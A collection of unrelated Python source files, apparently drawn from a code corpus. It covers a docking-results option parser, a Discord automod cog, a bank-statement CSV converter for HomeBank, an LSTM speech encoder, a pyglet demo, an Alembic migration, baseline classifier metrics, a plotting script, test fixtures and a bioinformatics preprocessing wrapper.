self.finish, font=self.font2, justify=CENTER, textvariable=self.txtname)
self.fnh_txtin.grid(row=3, column=2)
self.fnh_btn = ttk.Button(
self.finish, text="OK", command=self.getname2)
self.fnh_btn.grid(row=4, column=2, padx=16, pady=16)
menuApp = _menuApp()
menuApp.root.mainloop()
|
python
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import getopt
import os
import sys
import re
from .debug import Debug
from .debug import BColors
from subprocess import Popen, PIPE
from .debug import Debug
class InputParams(object):
def __init__(self, cfg, argv):
self.PROG_OPT_RE = re.compile(r'^([A-Z\d]+)[_-](?:([A-Z\d]+)[_-])?')
self.cfg = cfg
self.argv = argv
self.TAG = "InputPArams"
self.color = BColors.GREEN
self.get_input_params()
def get_input_params(self):
if len(self.argv) == 1:
self.cfg.print_format_help("Mandatory options:", "")
self.cfg.print_format_help("-i", "result folder genereted by MetaScreener")
self.cfg.print_format_help("-p", "Original target")
self.cfg.print_format_help("--pdb", "Original target in pdb format")
self.cfg.print_format_help("-l", "Original query")
print("")
self.cfg.print_format_help("Optional options:", "")
self.cfg.print_format_help("--cores", "Maximum number of cores; Use 0 for autodetect; Default: 1")
self.cfg.print_format_help("--profile", "webBD STANDARD_BD STANDARD_VS")
self.cfg.print_format_help("--prog", "Software")
self.cfg.print_format_help("--opt", "opt")
self.cfg.print_format_help("-c", "cut-off of energies; Default: 0")
self.cfg.print_format_help("-z", "Clustering only for BD; Deafult: y")
self.cfg.print_format_help("-s", "Generate poseview; Deafult: y")
self.cfg.print_format_help("-t", "Generate plip interactions; Deafult: y")
self.cfg.print_format_help("-f", "If folder exits don't overwrite; Deafult: y")
self.cfg.print_format_help("-a", "Generate pymol sessions with plip;"
"Deafult: n")
self.cfg.print_format_help("--rb", "Number of files saved as bestScore in VS. Default(50)")
self.cfg.print_format_help("--rf", "Number of files saved in VS. Default (500)")
self.cfg.print_format_help("-b", "Chain of residues split by ':', type cad_res_num, "
" For example A_TYR_385:A_VAL_434:A_VAL_5")
self.cfg.print_format_help("-e", "ONLY BD; calcula la distancia entre el centro del ligando original y el"
" centro del ligando "
"de docking; Deafult: n")
self.cfg.print_format_help("-d", "Debug level; Deafult: 0 (off)")
print("\nUsage: %s -i input Docking -p proteinFile -l ligFile -c min Score -s poseview y -z clusterizado y"
% sys.argv[0] + "\n")
exit()
print("Using {} core{} for procesing results.".format(self.cfg.cores, 's' if self.cfg.cores > 1 else ''))
# Read command line args
myopts, args = getopt.getopt(self.argv[1:], "i:p:l:c:s:z:t:d:k:f:a:b:r:e:",
["cores=", "prog=", "opt=", "profile=", "flex", "rb=", "rf=", "pdb="])
for o, a in myopts:
if o == '--profile':
self.cfg.use_profile = a.upper()
if self.cfg.use_profile:
self.cfg.set_profile_cfg(self.cfg.use_profile)
for o, a in myopts:
if o == '-i':
self.cfg.file_input = os.path.realpath(a if a.endswith('/') else "{}/".format(a))
elif o == '-p':
self.cfg.file_target = a
elif o == '--pdb':
self.cfg.file_target_pdb = a
elif o == '-c':
self.cfg.engCorte = float(a)
elif o == '-l':
self.cfg.file_query = a
elif o == '-s':
self.cfg.poseview = a
elif o == '-z':
self.cfg.clusterizado = a
elif o == '-d':
self.cfg.mode_debug = a
elif o == '-a':
self.cfg.plip = a
elif o == '-f':
self.cfg.createFolder = a
elif o == '-e':
self.cfg.distanceLigs = a
elif o == '-b':
aux = a.split(":")
for i in aux:
self.cfg.resnPoseviewDetct.append(i)
elif o == '--flex':
self.cfg.flexible = True
elif o == '--cores':
self.cfg.cores = int(a)
max_cores = cpu_count()
if self.cfg.cores == 0 or self.cfg.cores > max_cores:
self.cfg.cores = max_cores
elif self.cfg.cores < 0:
self.cfg.cores = 1
elif o == '--profile':
self.cfg.use_profile = a.upper()
elif o == '--prog':
self.cfg.programa = a.upper()
elif o == '--opt':
if not self.cfg.use_profile:
self.cfg.opcion = a.upper()
elif o == '--rb':
self.cfg.resultados_best_score = int(a)
elif o == '--rf':
self.cfg.resultados_ficheros = int(a)
else:
print("\nUsage: %s -i input Docking -p proteinFile -l ligFile -c min Score -s poseview y "
"-z clusterizado y -t inteacciones y -d debug [0-10]" % sys.argv[0] + "\n")
exit()
self.cfg.debug = Debug(self.cfg.mode_debug)
self.cfg.file_target = os.path.realpath(self.cfg.file_target)
if self.cfg.file_target_pdb:
self.cfg.file_target_pdb = os.path.realpath(self.cfg.file_target_pdb)
self.cfg.file_query = os.path.realpath(self.cfg.file_query)
self.cfg.file_input = os.path.realpath(self.cfg.file_input)
# Get compounds names and input path
self.cfg.extract_names()
if not self.cfg.file_target or not os.path.exists(self.cfg.file_target):
print("Target(s) not indicated(s), aborting.")
exit()
elif not self.cfg.file_query or not os.path.exists(self.cfg.file_query):
print("Query(s) not found, aborting.")
exit()
elif not self.cfg.file_input or not os.path.exists(self.cfg.file_input):
print("Path of docking results not found, aborting.")
exit()
self.cfg.print_format("Input files:", "", "")
self.cfg.print_format("", "Query: ", self.cfg.file_target)
self.cfg.print_format("", "Ligands: ", self.cfg.file_query)
self.cfg.print_format("", "Directory MetaScreener: ", self.cfg.file_input + "/")
#
# Test folders
#
self.cfg.SHUTTLEMOL_DIRS = self.cfg.perfiles.get_folders()
self.cfg.OUTPUT_DIRS = self.cfg.perfiles.get_out_folders()
self.cfg.OUTPUT_GRAPHS = self.cfg.perfiles.get_files_out()
self.cfg.ext_query = os.path.splitext(self.cfg.file_query)[1].strip()
self.cfg.ext_target = os.path.splitext(self.cfg.file_target)[1].strip()
comando = ("find " + self.cfg.file_input + "/" + self.cfg.SHUTTLEMOL_DIRS[
'folderMolec'] + "/ ")
aux = self.cfg.execute(self.TAG, comando)
aux = aux.split("\n")
if os.path.isdir(aux[0]):
del aux[0]
self.cfg.extLigand = str(os.path.splitext(aux[0])[1]).strip()
self.cfg.print_format("", "Ext Prot: ", self.cfg.ext_target)
self.cfg.print_format("", "Ext Lig: ", self.cfg.ext_query)
if self.cfg.mode_debug:
debug = Debug(self.cfg.mode_debug)
for i in self.cfg.SHUTTLEMOL_DIRS:
debug.show(self.TAG + " metascreener Dirs: " + i, self.color)
for i in self.cfg.OUTPUT_DIRS:
debug.show(self.TAG + " Out Dirs: " + i + " " + self.cfg.OUTPUT_DIRS[i], self.color)
for i in self.cfg.OUTPUT_GRAPHS:
debug.show(self.TAG + " Out Dirs: " + i + " " + self.cfg.OUTPUT_GRAPHS[i]['outPut'], self.color)
if not self.cfg.programa or not self.cfg.opcion:
match = self.PROG_OPT_RE.match(self.cfg.nameEntrada)
if match and len(match.group()) > 1:
self.cfg.programa = match.group(2).strip()
self.cfg.opcion = match.group(1).strip()
else:
print("The program or the option could not be determined, aborting ")
exit()
self.cfg.print_format("\nTest data:", "", "")
self.cfg.print_format("", "Software: ", self.cfg.programa)
self.cfg.print_format("", "Technique: ", self.cfg.opcion)
self.cfg.print_format("", "Molecules:", str(len(aux)) + "\n")
|
python
|
"""Test."""
import unittest
class TestX(unittest.TestCase):
"""Tests."""
def test_f(self):
"""Test."""
self.assertTrue(True)
if __name__ == '__main__':
unittest.main()
|
python
|
import discord
from redbot.core import Config, commands, checks
class Automod(commands.Cog):
"""Automoderation commands"""
def __init__(self):
self.config = Config.get_conf(self, identifier=1234567890)
watching = list()
self.config.init_custom("ChannelsWatched", 1)
self.config.register_custom("ChannelsWatched", **watching)
blacklisted_words = list()
self.config.init_custom("BlacklistedWords", 1)
self.config.register_custom("BlacklistedWords", **blacklisted_words)
@commands.group(name='automod')
async def automod(self, ctx):
pass
@automod.command(name='watch')
@commands.admin()
async def watch(self, ctx, channel: discord.TextChannel):
await self.config.custom("ChannelsWatched").watching().append(channel)
await ctx.send(f'Watching {channel.name}')
@automod.command(name='unwatch')
@commands.admin()
async def unwatch(self, ctx, channel: discord.TextChannel):
watching = await self.config.custom("ChannelsWatched").watching()
del watching[channel]
await ctx.send(f'Stopped watching {channel.name}')
@automod.command(name='block')
@commands.admin()
async def watch(self, ctx, word: str):
await self.config.custom("BlacklistedWords").blacklisted_words.append(word)
await ctx.send(f'Blocked `{word}`')
@automod.command(name='unblock')
@commands.admin()
async def unwatch(self, ctx, word: str):
blacklisted = await self.config.custom("BlacklistedWords").blacklisted_words()
del blacklisted[word]
await ctx.send(f'Unblocked `{word}`')
@automod.command(name='listblocked')
async def listblocked(self, ctx):
blacklisted = await self.config.custom("BlacklistedWords").blacklisted_words()
await ctx.send(f'```{str(blacklisted)}```')
@commands.Cog.listener()
async def on_message(self, message):
watching_channels = await self.config.custom("ChannelsWatched").watching()
blacklisted_words = await self.config.custom("BlacklistedWords").blacklisted_words()
if not message.channel in watching_channels:
return
for word in blacklisted_words:
if message.content in word:
await message.delete()
|
python
|
#! /user/bin/env python3
import argparse
import xlrd
from datetime import datetime
import pandas as pd
import os
import shutil
import configparser
config = configparser.ConfigParser()
config.read("config.ini")
unixFilesPath = os.getcwd() + config["FilePaths"]["unixFilesPath"]
unixConvertedPath = os.getcwd() + config["FilePaths"]["unixConvertedPath"]
windowsFilesPath = os.getcwd() + config["FilePaths"]["windowsFilesPath"]
windowsConvertedPath = os.getcwd() + config["FilePaths"]["windowsConvertedPath"]
user = config["User"]["username"]
homeBankCols = config["HomeBank"]["homeBankCols"].split(sep=",")
amexHeaders = config["CSVHeaders"]["amexHeaders"].split(sep=",")
boaCAHeaders = config["CSVHeaders"]["boaCAHeaders"].split(sep=",")
boaCCHeaders = config["CSVHeaders"]["boaCCHeaders"].split(sep=",")
earnestHeaders = config["CSVHeaders"]["earnestHeaders"].split(sep=",")
vanguardRothHeaders = config["CSVHeaders"]["vanguardRothHeaders"].split(sep=",")
vanguard401KHeaders = config["CSVHeaders"]["vanguard401KHeaders"].split(sep=",")
venmoHeaders = config["CSVHeaders"]["venmoHeaders"].split(sep=",")
paypalHeaders = config["CSVHeaders"]["paypalHeaders"].split(sep=",")
def amexCCConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename, header=0)
if all(inputDataDict.columns == amexHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
if pd.notna:
data.append([row["Date"], None, None, row["Description"], None,
-1*row["Amount"],
None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/amexHomeBank.csv", index=False, sep=";")
def boaCAConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename, header=5)
if all(inputDataDict.columns == boaCAHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
data.append([row["Date"], None, None, row["Description"],
None, row["Amount"], None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/boaCAHomeBank.csv", index=False, sep=";")
def boaCCConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename, header=0)
if all(inputDataDict.columns == boaCCHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
data.append([row["Posted Date"], None, row["Reference Number"], row["Payee"],
None, row["Amount"], None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/boaCCHomeBank.csv", index=False, sep=";")
def earnestConversion(filename):
inputDataDict = pd.read_html(io=filename)[0]
try:
if all(inputDataDict.columns == earnestHeaders):
inputDataDict = pd.read_html(io=filename)[0].to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
# Just the loan
data.append([row["Date"], None, None, user, None,
row["Total"][2:],
"Loan Payment", None])
# Just the interest
data.append([row["Date"], None, None, "Earnest", None,
"-" + row["Interest"][2:],
"Loan Interest", None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/earnestHomeBank.csv", index=False, sep=";")
def vanguardRothConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename,header=3)
inputDataDict = inputDataDict.loc[:, ~inputDataDict.columns.str.contains('^Unnamed')]
if all(inputDataDict.columns == vanguardRothHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
if vanguardRothLogic(row["Transaction Type"]):
data.append([row["Settlement Date"], 0, row["Transaction Description"], "Vanguard",
None, row["Principal Amount"], None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/vanguardRothHomeBank.csv", index=False, sep=";")
def vanguardRothLogic(rowType):
if rowType == "Dividend":
return True
elif rowType == "Contribution":
return True
elif rowType == "Capital gain (LT)":
return True
elif rowType == "Capital gain (ST)":
return True
else:
return False
def vanguard401KConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename,header=16)
inputDataDict = inputDataDict.loc[:, ~inputDataDict.columns.str.contains('^Unnamed')]
if all(inputDataDict.columns == vanguard401KHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
if vanguard401KLogic(row["Transaction Description"]):
data.append([
row["Run Date"], None, row["Transaction Description"],
"Vanguard", None, row["Dollar Amount"], None, row["Investment Name"]
])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/vanguard401KHomeBank.csv", index=False, sep=";")
def vanguard401KLogic(rowType):
if rowType == "Plan Contribution":
return True
elif rowType == "Dividends on Equity Investments":
return True
else:
return False
def venmoConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename,header=0)
inputDataDict["Datetime"] = pd.to_datetime(inputDataDict["Datetime"],format="%Y-%m-%dT%H:%M:%S")
if all(inputDataDict.columns == venmoHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
if pd.notnull(row["Amount (total)"]):
data.append([
row["Datetime"].strftime("%m/%d/%Y"),
None, row["Note"],
venmoLogic(row),
"Venmo " + row["Type"],
row["Amount (total)"], None, None])
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/venmoHomeBank.csv", index=False, sep=";")
def paypalConversion(filename):
try:
inputDataDict = pd.read_csv(filepath_or_buffer=filename, header=0)
if all(inputDataDict.columns == paypalHeaders):
inputDataDict = inputDataDict.to_dict("records")
except:
raise Exception
data = []
for row in inputDataDict:
if pd.notnull(row["Amount"]):
data.append([
row["Date"],
None, row["Type"],
row["Name"] if pd.notnull(
row["Name"]) else paypalLogic(row["Type"]),
None, row["Amount"], None, None])
if len(data) == 0:
raise Exception()
outputDataFrame = pd.DataFrame(data=data, columns=homeBankCols)
outputDataFrame.to_csv(
"convertedfiles/paypalHomeBank.csv", index=False, sep=";")
def paypalLogic(type_name):
if type_name == "General Credit Card Deposit":
return "Paypal"
else:
return None
def init():
try:
os.mkdir("files")
os.mkdir("convertedfiles")
print("Init success")
except:
print("Init failed")
def runAll():
print("Running all possible conversions")
cwd = ""
try:
if os.name == "nt":
fileList = os.listdir(windowsFilesPath)
cwd = windowsFilesPath + "\\"
else:
fileList = os.listdir(unixFilesPath)
cwd = unixFilesPath + "/"
except:
raise Exception
for file in fileList:
filePath = cwd + file
try:
amexCCConversion(filePath)
print(file + " is amexCC")
except:
print(file + " is not amexCC")
try:
boaCAConversion(filePath)
print(file + " is boaCA")
except:
print(file + " is not boaCA")
try:
boaCCConversion(filePath)
print(file + " is boaCC")
except:
print(file + " is not boaCC")
try:
earnestConversion(filePath)
print(file + " is earnest")
except:
print(file + " is not earnest")
try:
vanguardRothConversion(filePath)
print(file + " is vanguardRoth")
except:
print(file + " is not vanguardRoth")
try:
vanguard401KConversion(filePath)
print(file + " is vanguard401k")
except:
print(file + " is not vanguard401k")
try:
venmoConversion(filePath)
print(file + " is venmo")
except:
print(file + " is not venmo")
try:
paypalConversion(filePath)
print(file + " is paypal")
except:
print(file + " is not paypal")
def clean():
try:
if os.name == "nt":
shutil.rmtree(windowsFilesPath)
shutil.rmtree(windowsConvertedPath)
else:
shutil.rmtree(unixFilesPath)
shutil.rmtree(unixConvertedPath)
print("Directories have been removed")
except:
print("Directories were not cleaned")
def venmoLogic(row):
if row["Type"] == "Charge":
return row["To"]
elif row["Type"] == "Standard Transfer":
return user
elif row["Type"] == "Payment":
return row["From"]
else:
return None
def main():
parser1 = argparse.ArgumentParser(add_help=False,
description="Convert data files from online banking sites to Homebank compatible CSV formats. Default is to run all")
parser1.add_argument("--clean", action="store_true",
help="deletes the \'convertedfiles\' and \'files\' directories and its contents")
parser1.add_argument("--init", action="store_true",
help="initialize the directories by creating the \'convertedfiles\' and \'files\' directories ")
parser2 = argparse.ArgumentParser(parents=[parser1])
group = parser2.add_mutually_exclusive_group()
group.add_argument("--amex", nargs=1,
help="convert an American Express credit card account CSV file",)
group.add_argument("--boaCA", nargs=1,
help="convert a Bank of America checking account CSV file")
group.add_argument("--boaCC", nargs=1,
help="convert a Bank of America credit card CSV file")
group.add_argument("--earnest", nargs=1,
help="convert an Earnest xlsx file")
group.add_argument("--venmo", nargs=1,
help="convert a Venmo csv file")
group.add_argument("--vRoth", nargs=1,
help="convert a Vanguard Roth csv file")
group.add_argument("--v401k", nargs=1,
help="convert a Vanguard 401K csv file")
group.add_argument("--paypal", nargs=1,
help="convert a Paypal csv file")
args = parser2.parse_args()
if args.clean:
clean()
elif args.init:
init()
elif args.amex:
amexCCConversion(args.amex[0])
print("AMEX file converted. Output file: amexHomeBank.csv")
elif args.boaCA:
boaCAConversion(args.boaCA[0])
print("BOA CA file converted. Output file: boaHomeBank.csv")
elif args.boaCC:
boaCCConversion(args.boaCC[0])
print("BOA CC file converted. Output file: boaHomeBank.csv")
elif args.earnest:
earnestConversion(args.earnest[0])
print("Earnest file converted. Output file: earnestHomeBank.csv")
elif args.venmo:
venmoConversion(args.venmo[0])
print("Venmo file converted. Output file: venmoHomeBank.csv")
elif args.vRoth:
vanguardRothConversion(args.vRoth[0])
print("Vanguard Roth file converted. Output file: vanguardRothHomeBank.csv")
elif args.v401k:
vanguard401KConversion(args.v401k[0])
print("Vanguard 401k file converted. Output file: vanguard401kHomeBank.csv")
elif args.paypal:
paypalConversion(args.paypal[0])
print("Paypal file converted. Output file: paypalHomeBank.csv")
else:
runAll()
if __name__ == "__main__":
main()
|
python
|
#-*- coding:utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=import-error, too-few-public-methods, too-many-locals
# pylint: disable=too-many-arguments, too-many-instance-attributes, invalid-name
"""
lstm_encoder.py: the implementation of lstm ctc
"""
__author__ = "Kyungmin Lee"
__email__ = "[email protected]"
import math
import tensorflow as tf
import tfsr.helper.model_helper as mh
from tfsr.model.sequence_router import CapsulationLayer
class LstmEncoder(tf.keras.Model): #pylint: disable=too-many-ancestors
"""
An implementation of LSTM based speech encoders.
"""
def get_config(self):
pass
def __init__(self, config, vocab_n):
super().__init__()
self.mask = tf.keras.layers.Lambda(mh.feat_mask2, name="pad_mask")
num_layers = config.model_encoder_num
d_model = config.model_dimension
input_dropout = config.train_inp_dropout
inner_dropout = config.train_inn_dropout
init = config.model_initializer
self.d_model = d_model
self.num_layers = num_layers
if config.model_type.lower() == "blstm":
self.enc_layers = [tf.keras.layers.Bidirectional(tf.keras.layers.LSTM(
d_model, return_sequences=True, kernel_initializer=mh.get_init(
init)), merge_mode="ave") for _ in range(num_layers)]
else:
self.enc_layers = \
[tf.keras.layers.LSTM(d_model, return_sequences=True,
kernel_initializer=mh.get_init(init))
for _ in range(num_layers)]
self.layernorms = [tf.keras.layers.LayerNormalization(epsilon=1e-6)
for _ in range(num_layers)]
self.dropouts = [tf.keras.layers.Dropout(rate=inner_dropout)
for _ in range(num_layers)]
self.ln = tf.keras.layers.LayerNormalization(epsilon=1e-6)
self.mask_layer = tf.keras.layers.Masking(mask_value=0.0)
self.input_dropout = tf.keras.layers.Dropout(rate=input_dropout)
self.proj = tf.keras.layers.Dense(
vocab_n, kernel_initializer=mh.get_init(init), use_bias=False)
kernel_size = 3
self.stride = stride = config.model_conv_stride
self.cnn_n = cnn_n = config.model_conv_layer_num
self.feat_dim = math.ceil(config.feat_dim / (stride ** cnn_n))
self.nfilt = nfilt = config.model_conv_filter_num
self.conv = CapsulationLayer(cnn_n, nfilt, kernel_size, self.stride, init,
name="conv_feat") \
if config.model_lstm_is_cnnfe else None
self.in_len_div = stride ** cnn_n if config.model_lstm_is_cnnfe else 1
def call(self, embeddings, **kwargs):
# pylint: disable=arguments-differ
inp_len = kwargs["input_lengths"]
training = kwargs["training"]
if self.conv is not None:
embeddings, batch, seq_len = self.conv(embeddings, input_lengths=inp_len)
embeddings = tf.reshape(embeddings,
[batch, seq_len, self.feat_dim * self.nfilt],
name="reshape_conv")
embeddings = self.input_dropout(embeddings, training=training)
for idx, enc_layer in enumerate(self.enc_layers):
embeddings = enc_layer(embeddings)
embeddings = self.layernorms[idx](embeddings)
embeddings = self.dropouts[idx](embeddings, training=training)
embeddings = self.proj(embeddings)
embeddings = self.mask([embeddings, inp_len, self.in_len_div])
embeddings = self.mask_layer(embeddings)
return self.ln(embeddings)
|
python
|
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''A simple demonstration of the HTMLLabel class, as it might be used on a
help or introductory screen.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
import os
import pyglet
html = '''
<h1>HTML labels in pyglet</h1>
<p align="center"><img src="pyglet.png" /></p>
<p>HTML labels are a simple way to add formatted text to your application.
Different <font face="Helvetica,Arial" size=+2>fonts</font>, <em>styles</em>
and <font color=maroon>colours</font> are supported.
<p>This window has been made resizable; text will reflow to fit the new size.
'''
window = pyglet.window.Window(resizable=True)
location = pyglet.resource.FileLocation(os.path.dirname(__file__))
label = pyglet.text.HTMLLabel(html, location=location,
width=window.width,
multiline=True, anchor_y='center')
@window.event
def on_resize(width, height):
# Wrap text to the width of the window
label.width = window.width
# Keep text vertically centered in the window
label.y = window.height // 2
@window.event
def on_draw():
window.clear()
label.draw()
pyglet.gl.glClearColor(1, 1, 1, 1)
pyglet.app.run()
|
python
|
"""Replace block with 'lock'
Revision ID: 8192b68b7bd0
Revises: 3176777cd2bb
Create Date: 2021-01-20 20:48:40.867104
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = "8192b68b7bd0"
down_revision = "3176777cd2bb"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column("user", sa.Column("locked", sa.Boolean(), nullable=True))
op.drop_column("user", "blocked")
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column(
"user",
sa.Column(
"blocked",
mysql.TINYINT(display_width=1),
autoincrement=False,
nullable=True,
),
)
op.drop_column("user", "locked")
# ### end Alembic commands ###
|
python
|
#TODO check whether dummy classifier also does this
def count_true_positive(two_column_data_set):
positive_count = 0
for data in two_column_data_set["class"]:
##Hate Speech is labelled 0 in this project
if data == 0:
positive_count += 1
return positive_count
def compute_precision(positive_count, two_column_data_set):
#positive count is false positives and rest of data set is true positive if all data is marked non hate speech
return (len(two_column_data_set["class"])-positive_count)/len(two_column_data_set["class"])
def compute_recall(positive_count, two_column_data_set):
#always one, because there's never a true negative, because hate speech is never labelled as such
return (len(two_column_data_set["class"])-positive_count)/(len(two_column_data_set["class"])-positive_count)
def compute_accuracy(positive_count, two_column_data_set):
return (len(two_column_data_set["class"])-positive_count) / len(two_column_data_set["class"])
def compute_f_one(precision, recall):
return 2*precision*recall/(precision+recall)
def print_metrics(positive_count, two_column_data_set):
print("Accuracy: ", compute_accuracy(positive_count, two_column_data_set),"\n",
"Precision: ", compute_precision(positive_count, two_column_data_set), "\n",
"Recall: ", compute_recall(positive_count, two_column_data_set),"\n",
"F1: ", compute_f_one(compute_precision(positive_count, two_column_data_set), compute_recall(positive_count, two_column_data_set)))
|
python
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from src.data_schema.feature_names import FeatureNames
from src.data_preparation.input_data_schema import LasVegasGovtDataSchema
def plot_feature_stat(df, feature_xaxis, feature_yaxis, output_file):
##### construct list of mean, standard deviation, max values,###
# min values, used for graph datapoints #####
groups_df = df.groupby([feature_xaxis])
# mean_df = df.groupby(feature_xaxis, as_index=False)[feature_yaxis].mean()
mean_df = groups_df.mean()
mean_list = mean_df[feature_yaxis]
feature_list = df.groupby([feature_xaxis])[feature_xaxis]
# sd_df = df.groupby(feature_xaxis, as_index=False)[feature_yaxis].std()
sd_df = groups_df.std()
# df.groupby([feature_xaxis]).std()
sd_list = sd_df[feature_yaxis]
# min_df = df.groupby(feature_xaxis, as_index=False)[feature_yaxis].min()
min_df = groups_df.min()
min_list = min_df[feature_yaxis]
# max_df = df.groupby(feature_xaxis, as_index=False)[feature_yaxis].max()
max_df = groups_df.max()
max_list = max_df[feature_yaxis]
#### plot the mean, standard deviation, max value, min value in graph #####
plt.errorbar(np.arange(len(feature_list)), mean_list.values, sd_list.values, fmt='ok', ecolor='blue', lw=3)
plt.errorbar(np.arange(len(feature_list)), mean_list.values,
[mean_list.values - min_list.values, max_list.values - mean_list.values],
fmt='.k', ecolor='gray', lw=1)
#### Round off the score to two decimal places to be displayed in the graph #####
for i in range(len(mean_list)):
mean_list[i] = round(mean_list[i],2)
for i in range(len(min_list)):
min_list[i] = round(min_list[i],2)
for i in range(len(max_list)):
max_list[i] = round(max_list[i],2)
#### annonate the values of datapoint labels in the graph ######
for xy in zip(np.arange(len(feature_list)), mean_list.values):
plt.annotate('(%s, %s)' % xy, xy=xy, textcoords='data')
for xy in zip(np.arange(len(feature_list)), min_list.values):
plt.annotate('(%s, %s)' % xy, xy=xy, textcoords='data')
for xy in zip(np.arange(len(feature_list)), max_list.values):
plt.annotate('(%s, %s)' % xy, xy=xy, textcoords='data')
#### display/save the label on x and y axis #####
plt.xlabel(feature_xaxis)
plt.ylabel(feature_yaxis)
# plt.show()
plt.savefig(output_file)
if __name__ == '__main__':
file = '../../resources/dataset/final_lasvegas_dataset.csv'
output_file = '../../resources/images/graphs/price.png'
df = pd.read_csv(file)
schema_obj = FeatureNames()
df = df[[schema_obj.COL_RESTAURANTS_PRICE_RANGE2, schema_obj.COL_INSPECTION_SCORE]]
plot_feature_stat(df, schema_obj.COL_RESTAURANTS_PRICE_RANGE2, schema_obj.COL_INSPECTION_SCORE, output_file)
|
python
|
from .sqlalchemy_conftest import * # noqa
@pytest.fixture(scope="session", autouse=True)
def set_up_gcs_mock_tempdir(tmp_path_factory):
from .okta_mock import _Auth
from alchemy.shared import auth_backends
auth_backends.auth, auth_backends.__auth = _Auth(), auth_backends.auth
auth_backends.init_app, auth_backends.__init_app = (lambda app, auth: None), auth_backends.init_app
class ReverseMock:
def __init__(self):
self.bypass_original = None
def __enter__(self):
self.bypass_original = auth_backends.auth.bypass
auth_backends.auth.bypass = False
def __exit__(self, exc_type, exc_val, exc_tb):
auth_backends.auth.bypass = self.bypass_original
auth_backends.ReverseMock = ReverseMock
@pytest.fixture(scope="session", autouse=True)
def disable_cloud_logging():
import os
old_val = os.environ.get('USE_CLOUD_LOGGING', default=None)
os.environ['USE_CLOUD_LOGGING'] = '0'
yield
if old_val is None:
del os.environ['USE_CLOUD_LOGGING']
else:
os.environ['USE_CLOUD_LOGGING'] = old_val
|
python
|
import argparse
from snakemake.shell import shell
from .slurm_job import SlurmJob
from exceRNApipeline.includes.utils import logger
def pre_process(input_fq, adapter, log_file, prefix):
cmd = f"""
hts_Stats -L {log_file} -U {input_fq} | \\
hts_AdapterTrimmer -A -L {log_file} -a {adapter} | \\
hts_QWindowTrim -n -A -L {log_file} | \\
hts_NTrimmer -n -A -L {log_file} | \\
hts_Stats -A -L {log_file} -f {prefix}
"""
logger(cmd)
shell(cmd)
